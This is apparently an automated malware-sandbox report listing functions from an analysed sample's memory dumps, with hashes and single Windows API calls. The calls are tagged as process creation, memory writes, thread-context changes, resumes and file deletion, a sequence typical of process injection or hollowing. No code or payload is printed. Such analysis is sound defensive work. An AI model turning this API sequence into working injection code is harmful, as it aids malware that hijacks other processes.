Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573e1473b7d6b2e0875dec1b505fcbb6ab0b8fb76a1b363b703b6e02d4bc114f
Instruction ID: efc638b2eaf56b57f8a9f92c85bf5e88272bdb9acd2a0957b14b0da3c0cd9f27
Opcode Fuzzy Hash: 573e1473b7d6b2e0875dec1b505fcbb6ab0b8fb76a1b363b703b6e02d4bc114f
Instruction Fuzzy Hash: 8B217E74D04208AFDB04CFAAD4446EEFBB5BB49310F20D16AE824B7390D7749541CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 054B5C65, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6ee81318f3a4ac9d8c6ae7a420a51ee2ea4a37fb0459e1327bbcc9f7fba2b8
Instruction ID: 6850abacbceddea1cd8fde174880495bb51af19b6e1a76a7a503a348a0cc1e14
Opcode Fuzzy Hash: 5d6ee81318f3a4ac9d8c6ae7a420a51ee2ea4a37fb0459e1327bbcc9f7fba2b8
Instruction Fuzzy Hash: E4F062B5D052099B8B44CFA9D9414EEFBF2BB5A310F14A16AE814B3310E73599118F68

Uniqueness

Uniqueness Score: -1.00%

Function 054B5C70, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction ID: 519395276ce9821259a7ebf57f558bfec274aa766245a078bb51722b7b33a68b
Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction Fuzzy Hash: 3AF042B5D0520C9F8F04DFA9D5418EEFBF2AB5A310F10A16AE814B3310E73599518FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00D251CD, Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00D253C4

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: a003a33953ae7f77966339dbcf99c966da652f6fb26a4f4b7620ddb460614606
Instruction ID: e797a9468c095868058e427886c28eceea6d144a4790e3678fcac8a9f078746f
Opcode Fuzzy Hash: a003a33953ae7f77966339dbcf99c966da652f6fb26a4f4b7620ddb460614606
Instruction Fuzzy Hash: C491EE75D0026D9FCF21CFA8D884BDDBBB1AF1A304F0494AAE548B7210DB70AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00D283AA, Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D28483

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8828b2a37af9d7ef81af7777a007a3a737b3515281d42d18eba14302a6745fed
Instruction ID: 9b99a97f9bde992085b907e015dc1e066e01d9903302c9d15382d9474f6c2427
Opcode Fuzzy Hash: 8828b2a37af9d7ef81af7777a007a3a737b3515281d42d18eba14302a6745fed
Instruction Fuzzy Hash: 7C419CB5D012589FCF10CFA9D984AEEBBF1BF49314F14942AE819B7210D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D283B0, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D28483

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ca02a345593e428ab65f8bd754421a6b6ec4738924dc10a27dad16fd623d0f8f
Instruction ID: 7658fecd6a4081a6eaf8bb19445c06793f2101b9de643dd3f08a979d5b6cd1c6
Opcode Fuzzy Hash: ca02a345593e428ab65f8bd754421a6b6ec4738924dc10a27dad16fd623d0f8f
Instruction Fuzzy Hash: 0A4199B5D012589FCF00CFA9D984AEEFBF1BB49314F14942AE818B7200D734AA46CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D27CB8, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00D27D6A

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a638829440cc779788d418c768aece3f35d1c475e306fbf7ff97a70c09aef620
Instruction ID: 33ab024091494d96ce9f05ef2a3fbd294b9b5774a71632efbbad934e269ac98d
Opcode Fuzzy Hash: a638829440cc779788d418c768aece3f35d1c475e306fbf7ff97a70c09aef620
Instruction Fuzzy Hash: 0131A7B9D04258DBCF10CFA9E980AEEBBB1BF59314F14942AE815B7300D735A906CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D27CC0, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00D27D6A

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3402a6c7388569cd404af12af8a67191660811da2aeaa7ab0983d3d6b8787b4f
Instruction ID: 05776c1b28f2f8e0b8ce93e07557fea5c67fb5f4f8080d80c002c2c392697d88
Opcode Fuzzy Hash: 3402a6c7388569cd404af12af8a67191660811da2aeaa7ab0983d3d6b8787b4f
Instruction Fuzzy Hash: 413196B5D04258DBCF10CFA9E880AEEBBB5BB59314F10A42AE815B7300D735A906CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0128F512, Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0128F5BF

Memory Dump Source

Source File: 00000016.00000002.597094736.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e98f1e8d9a1dd176ebee9c28c109d152b32961acaff65e77e369d8cf50615f35
Instruction ID: 240f498250cbfe11142b814d116f7200fa36f496c7014ca05f4967df269ba72a
Opcode Fuzzy Hash: e98f1e8d9a1dd176ebee9c28c109d152b32961acaff65e77e369d8cf50615f35
Instruction Fuzzy Hash: 9031A8B5D012589FCF10CFA9E584AEEFBF5BB59310F14A02AE815B7210D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0128B819, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0128B8C7

Memory Dump Source

Source File: 00000016.00000002.597094736.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: defe1a1a880b88e6fca7c1b717c56bbb4abdd1ca73208e9e9f81f59dc9b12bf4
Instruction ID: db6e7fae981f9ffb5476ae9f6edba3ae22e527b46bce2061c38dc3262a83d047
Opcode Fuzzy Hash: defe1a1a880b88e6fca7c1b717c56bbb4abdd1ca73208e9e9f81f59dc9b12bf4
Instruction Fuzzy Hash: 6C31A8B9D10258DFCB10CFA9D584AEEFBF4BB49310F14902AE824B7250D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D271C0, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 00D27277

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 6d38a263148470cf49fdb5823a2edc4e6a584cb53389c4a390282780687832f5
Instruction ID: 9011aab4ffd210742578c64ca9f0256bea7bb1344763bf45af927a8798a5c8e4
Opcode Fuzzy Hash: 6d38a263148470cf49fdb5823a2edc4e6a584cb53389c4a390282780687832f5
Instruction Fuzzy Hash: 5A41ABB5D05259DFCB10CFA9D985AEEBBF1AF49314F14842AE418BB200D738A949CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0128B820, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0128B8C7

Memory Dump Source

Source File: 00000016.00000002.597094736.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 90b0be9c1749538e947ea06b393b5396e1062db8c62d88ec9c49df3aa1d95ab3
Instruction ID: 36bb8353823f635f3e44e5c98d5bfb7b0866543ed28209e190620edcc3a964f7
Opcode Fuzzy Hash: 90b0be9c1749538e947ea06b393b5396e1062db8c62d88ec9c49df3aa1d95ab3
Instruction Fuzzy Hash: B531A7B9D002589FCB10CFA9D884ADEFBF0BB09310F14902AE814B7210D734A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0128F518, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0128F5BF

Memory Dump Source

Source File: 00000016.00000002.597094736.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 952f98e3f4de89cc9eacab0dae4a0fe664791595f3be7803194b3992513af4de
Instruction ID: 86b38e481f76854c1229a53f14bbf9b63cf20795df79368096f08dcf183bd28d
Opcode Fuzzy Hash: 952f98e3f4de89cc9eacab0dae4a0fe664791595f3be7803194b3992513af4de
Instruction Fuzzy Hash: 3E31B8B9D002589FCF10CFA9E984ADEFBF0BB49310F14902AE814B7210D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D271C8, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 00D27277

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: f784ed682112b099d9d0037c9441656966057b147a5bb1f072ea0e90201060ef
Instruction ID: 6da522245f571d4d93f34ead869a3540a7f8caae9353c8081e8a3e4f88ace2b0
Opcode Fuzzy Hash: f784ed682112b099d9d0037c9441656966057b147a5bb1f072ea0e90201060ef
Instruction Fuzzy Hash: B731BBB5D04258DFCB10CFA9D884AEEBBF1BF49314F14842AE414B7200D738A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D28930, Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00D289DF

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: a15274f2b097ad7ffe3a1d5e854227eaef915d78848bbd9b8e27181277b43ab3
Instruction ID: 89590707eaf515f13676e66e7b99ae2c5b83456e7ff90c7c81d0ae0064f42dbc
Opcode Fuzzy Hash: a15274f2b097ad7ffe3a1d5e854227eaef915d78848bbd9b8e27181277b43ab3
Instruction Fuzzy Hash: F031BCB5D012589FCB10CFA9D884AEEBBF1BF49314F14802AE415B7200DB38A985CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D2892A, Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00D289DF

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: f4952c6a76b1768b7a439978a78d94f2d6fd9b366a8dab915d924cb28ce58963
Instruction ID: 07810454305a8bc87124659e9457378c71ea7ffe7a6bc27c3f432f5c39927897
Opcode Fuzzy Hash: f4952c6a76b1768b7a439978a78d94f2d6fd9b366a8dab915d924cb28ce58963
Instruction Fuzzy Hash: 6841BCB5D012589FCB10CFA9D985AEEBBF1BF58314F14842AE415B7600DB38A985CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0128A8A4, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0128FC71

Memory Dump Source

Source File: 00000016.00000002.597094736.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: cbb2416f47508172a0aaa9372292bd72e7342b5101ef665832a52d4b54d05c47
Instruction ID: 3284c45db22f5da3f1a95631bf20e67825503c07898322fa61488c1ee889f36b
Opcode Fuzzy Hash: cbb2416f47508172a0aaa9372292bd72e7342b5101ef665832a52d4b54d05c47
Instruction Fuzzy Hash: 3F31E8B4D112189FCB00CFA9D984AEEFBF0BB49314F14802AE908B7350D374AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0128FBD0, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0128FC71

Memory Dump Source

Source File: 00000016.00000002.597094736.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1f19e0d3eaa95c39fc4e16cc4739c93c20d2e00c9861989fa4b6ae49fd88d8a8
Instruction ID: 11081b0f219f2e64667dd3a1b68ddf4bd8aaaf08b154e346c87d00a882dfa7da
Opcode Fuzzy Hash: 1f19e0d3eaa95c39fc4e16cc4739c93c20d2e00c9861989fa4b6ae49fd88d8a8
Instruction Fuzzy Hash: 2A31D9B4D05219DFCB10CFA9D984AEEFBF5BB49314F14802AE908B7250D734AA46CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D28B82, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00D28C06

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fdbbe3f71b445a3c019dfa64af19cdaad4c6041262ddad67696c1b3b32d91f4f
Instruction ID: 51a3add394eaedbda772c502f8e756918b151e78038d410b96025ae4d1534a61
Opcode Fuzzy Hash: fdbbe3f71b445a3c019dfa64af19cdaad4c6041262ddad67696c1b3b32d91f4f
Instruction Fuzzy Hash: D031BAB4D112189FCF10CFA9E984ADEBBB5AF49314F14942AE815B7700DB34A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D28B88, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00D28C06

Memory Dump Source

Source File: 00000016.00000002.594712241.0000000000D20000.00000040.00000001.sdmp, Offset: 00D20000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0e9cbc8425a3cd4451298f459e413f5a57dc7d70b9bfb7c768e255f1308147b9
Instruction ID: e1027db45dc1b51fa7005168c0a5d26b34a2bdcfba32c77bec180489767770ab
Opcode Fuzzy Hash: 0e9cbc8425a3cd4451298f459e413f5a57dc7d70b9bfb7c768e255f1308147b9
Instruction Fuzzy Hash: ED31C9B4D012189FCF10CFA9E884ADEFBB5AB49324F14942AE815B7300DB34A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 054BCA71, Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

kY, xrefs: 054BCAF1, 054BCAF6

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID: kY
API String ID: 0-1888472992
Opcode ID: 9eea8a049322b0ffc410f0a65ddd9c8b117c791779c932096313ffb7dc1c1970
Instruction ID: 47ff7abaa28854728f698cbaf7b342a751d58378077d58a21f3638a22eee6b12
Opcode Fuzzy Hash: 9eea8a049322b0ffc410f0a65ddd9c8b117c791779c932096313ffb7dc1c1970
Instruction Fuzzy Hash: AD2138B4D0520A9FCB44EFA8D8916EEBBF5EF89204F2085AAD414E3344E7345A05DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 054B8F28, Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df7aff0acede0cc1e0b70cb83b30ccf3664c480df2f7292d88f958bdc927f16
Instruction ID: b202beb667a08783fd95a163f1de833a4b359f23a25617b454ce75a8cb815882
Opcode Fuzzy Hash: 7df7aff0acede0cc1e0b70cb83b30ccf3664c480df2f7292d88f958bdc927f16
Instruction Fuzzy Hash: 8EE18C74A01219CFCB64DF68C984BD9BBB2BF49300F2081EAD959A7351DB70AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 054B9CD9, Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f12797ba7ff6fc78d79b2578528ca3f5bd3b20fe96822ec1aeda80a5ebc02e9f
Instruction ID: c8f5dc07d7b656a2ebdecfc2df1e2d6f8092f078c859279f6356c10569ebfad5
Opcode Fuzzy Hash: f12797ba7ff6fc78d79b2578528ca3f5bd3b20fe96822ec1aeda80a5ebc02e9f
Instruction Fuzzy Hash: 6FD1BF74E01228CFDB64DFA9D898B9DBBB2FF89305F1081AAD509A7344DB319985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054BAEB8, Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce09ee2605ec52d94c9bc8b0e6281bf8341b8cfd9e598cbc93fead242f7c279
Instruction ID: 6c44a6384ec338589a3c47f7b32ef384225249d35a1a1e47cdd2653d6112587f
Opcode Fuzzy Hash: 8ce09ee2605ec52d94c9bc8b0e6281bf8341b8cfd9e598cbc93fead242f7c279
Instruction Fuzzy Hash: 3EA1EE70E01228CFDB64DFA9D884ADDBBB2FF8A305F2041AAD409A7344DB359985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 054BAEC8, Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53745725a31949bd6bfeac40c1e0cc369c1b7e7328b0b660b912fd0efe754181
Instruction ID: 076ca9cab4aabc9fa14b0dd6415fd7ef7962189232c03718bb63581f867d09d2
Opcode Fuzzy Hash: 53745725a31949bd6bfeac40c1e0cc369c1b7e7328b0b660b912fd0efe754181
Instruction Fuzzy Hash: 13A1CE70E01228CFDB64DFA9D884ADDBBB2FF8A305F6045AAD409A7344DB359981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 054BBCD5, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5fa6b74ffe7a02e2a44381aeae9c7c1946bdf8911c860bd19deda8b66a1af81
Instruction ID: 0da0830e273618fe86d0abc8ad5af4841936e1c94a198178fc13d43c16c9100e
Opcode Fuzzy Hash: b5fa6b74ffe7a02e2a44381aeae9c7c1946bdf8911c860bd19deda8b66a1af81
Instruction Fuzzy Hash: 8F51DEB4D042189FDB20CFA8D984BDEBBB1FF49304F10916AE419AB360D774A986CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054BBCE0, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d973abf06679e4f9f4ef07043231c82dc4598c7d610141e40d1f98a1871d78
Instruction ID: ea9bea508f99150418afd7021d34d1642ba0dd27782fe1666696ea2f28971e2e
Opcode Fuzzy Hash: 39d973abf06679e4f9f4ef07043231c82dc4598c7d610141e40d1f98a1871d78
Instruction Fuzzy Hash: 6A51BCB4D042189FDB20CFA9C985BDEBBB5FB49304F20912AE419AB350DB74A946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 054BAC09, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f059570c7bf3770dbcb160e4a207ffe796031c4cc3358dcfdcafe90b6ada21e
Instruction ID: 7a26639396576826f236294971b407ee92dad6162d99cd0c35e77d6909691146
Opcode Fuzzy Hash: 0f059570c7bf3770dbcb160e4a207ffe796031c4cc3358dcfdcafe90b6ada21e
Instruction Fuzzy Hash: C171BB70E01218CFDB58DFA9D594ADDBBB2FF89305F60816AD409AB344DB35A942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054B8689, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65aee7c1741f3c772402b8119b090c703784e66aa7246ef1b386d349168e8f2b
Instruction ID: c776112555ba0b53de6ae96cdf3a1af07801280dece41f6fd8892622102ac17f
Opcode Fuzzy Hash: 65aee7c1741f3c772402b8119b090c703784e66aa7246ef1b386d349168e8f2b
Instruction Fuzzy Hash: DE51B274E112189FDB48DFA9D994ADEBBB2FF89300F209069E405AB364DB31AD01CF54

Uniqueness

Uniqueness Score: -1.00%

Function 054B8157, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8766b76d6a7a94b0a57aeb281fb0f58500bfb1a002addabaf5a86a5061dfba59
Instruction ID: bc2970b63847ae1b1e2376ea7ba8017a2d9ddf95ca120fec337b80e2b1eed901
Opcode Fuzzy Hash: 8766b76d6a7a94b0a57aeb281fb0f58500bfb1a002addabaf5a86a5061dfba59
Instruction Fuzzy Hash: 4E519F74E01208DFDB48DFA9D994A9EBBB2FF89304F219069E405AB365DB31AD01CF14

Uniqueness

Uniqueness Score: -1.00%

Function 054B5804, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30118f769489e4a134f718e86f143af878f4c44907ec92d5c5a53656a62c1a4
Instruction ID: f40db3a47ff5dc6b3fa6adbe9755ec008fb38c17c5f2d9a78f96e232abdf7ada
Opcode Fuzzy Hash: c30118f769489e4a134f718e86f143af878f4c44907ec92d5c5a53656a62c1a4
Instruction Fuzzy Hash: 4651E2B1D0021C9FDF20DFA8C984ADEBBB5BF49304F20856AD509BB210EB706A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 054BF1D0, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d20760f7dcd664c6d33fa4319db37d0829f6f1f43bfcc392436c60e84e23a2
Instruction ID: 68db91e3aeb73764091b9366c9c37150730be0f3948c21619ade4c3826172e13
Opcode Fuzzy Hash: 47d20760f7dcd664c6d33fa4319db37d0829f6f1f43bfcc392436c60e84e23a2
Instruction Fuzzy Hash: 6951A574E102189FDB48CFE9D994AEEBBB2FF88300F10812AE915AB354DB755946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054B5810, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d699bf3cdb85cc42fe58ff471f91ba2e78f3599e56fc3889fd73dcf2ccd5459e
Instruction ID: bcefcb1282f2ca2850f1b9689cf3d790c6f44c3f00b2a07d20499aba5c917101
Opcode Fuzzy Hash: d699bf3cdb85cc42fe58ff471f91ba2e78f3599e56fc3889fd73dcf2ccd5459e
Instruction Fuzzy Hash: F351D2B1D0421D9FDF10DFA8C984ADEBBB5BF49304F20956AD509BB210EB706A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 054BD560, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c66163ae225be49544c488e3e17e67f1e313ad1ced5b3d19b40e2c1c59055317
Instruction ID: 769fa0582973c92dabec37fe77b50a3b1ec9a69b83731e833364f52e0bbf678c
Opcode Fuzzy Hash: c66163ae225be49544c488e3e17e67f1e313ad1ced5b3d19b40e2c1c59055317
Instruction Fuzzy Hash: 0251B574E001099FDB08DFAAC584AEEBBF6BF88314F15C4A9D409A7355DB74A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 054B7468, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f067f48bfa36540805dcd564237bc090935941150b8d424ed25de7c05cfe5ab0
Instruction ID: 52153e286942c3d23052a0d7fe2e8c7beefddcf15515a84868d761648a8f1240
Opcode Fuzzy Hash: f067f48bfa36540805dcd564237bc090935941150b8d424ed25de7c05cfe5ab0
Instruction Fuzzy Hash: 2041C2B4E112099FDF04DFA9D984AEEBBF5FB89314F10842AE805B7350DB74A905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054B96F0, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c625d6b54ede6269e4143203e46b18f936732953a0b0cf49303fc0d5ed08a35
Instruction ID: 59fe4b0d8044235d130df997136d4a5b83c099c0d22a1ee97c143c02cc56dbc0
Opcode Fuzzy Hash: 0c625d6b54ede6269e4143203e46b18f936732953a0b0cf49303fc0d5ed08a35
Instruction Fuzzy Hash: 3651F374D102288FDB28DFA5C945ADEBBB2BF89304F20846AC409B7755EB715E46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 054BF1C0, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2911f424c36f74744be9d5f3bdfe9d86b17203b93216e8cf5b6d66ecb5ebf5f3
Instruction ID: 16d837a67996a4e1effb02ddab9985b494c88f9ed51aecb75a502a34a01bec9e
Opcode Fuzzy Hash: 2911f424c36f74744be9d5f3bdfe9d86b17203b93216e8cf5b6d66ecb5ebf5f3
Instruction Fuzzy Hash: CE51B374E112089FDB48CFE9D9846EEBBB2FF88300F10812AE915AB364DB715946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054BB6C8, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.605627746.00000000054B0000.00000040.00000001.sdmp, Offset: 054B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39aa94ac095ae7fc6c312f89c96a74d3e3c212643dcd6d9e3574acd6bebf61bf
Instruction ID: bc99da012ac4b17c1490d1245d435ba7e8b6d9bb5d798540a87240253afa6d93
Opcode Fuzzy Hash: 39aa94ac095ae7fc6c312f89c96a74d3e3c212643dcd6d9e3574acd6bebf61bf
